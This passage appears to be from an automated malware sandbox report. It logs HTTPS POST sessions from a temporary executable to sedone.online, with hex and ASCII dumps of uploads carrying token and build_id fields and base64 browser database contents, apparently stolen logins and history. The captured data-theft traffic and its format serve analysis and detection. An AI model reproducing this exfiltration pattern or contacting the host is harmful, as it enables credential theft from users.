d00AJefip4HWDdtn1sYGqcaGMY4aWn42POcv6x8tNwNNeLeXwLCEI/CKnCDVY8RcBHUiDUi5XSVuBDz4Lc4kZo+L9kOCIFHHgG89MFCUJGvg4XOtuVi8EG7EjOzN6oUkH16iA2Cl4IJzzy6lJdWF+yWlItz5SW0E3/RKKegacVVbqMLSwfRBxyDfPTBQlCRr4OFzrblYvBBuxIzsyv
2024-12-16 10:04:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50120	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:57 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZUAIEKXT2VAAIMY5XLN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 45 4b 58 54 32 56 41 41 49 4d 59 35 58 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 45 4b 58 54 32 56 41 41 49 4d 59 35 58 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 45 4b 58 54 32 56 41 41 49 4d 59 35 58 4c 4e 0d 0a 43 6f 6e 74 Data Ascii: ------OZUAIEKXT2VAAIMY5XLNContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------OZUAIEKXT2VAAIMY5XLNContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZUAIEKXT2VAAIMY5XLNCont
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
2024-12-16 10:04:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50133	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:58 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:58 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L6XBA1NYM7G47Q9000R1Cont
2024-12-16 10:04:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:58 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-12-16 10:04:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:58 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-16 10:04:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50149	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:01 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58YU37G4OZU37YUAS2NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------58YU37G4OZU37YUAS2NYCont
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 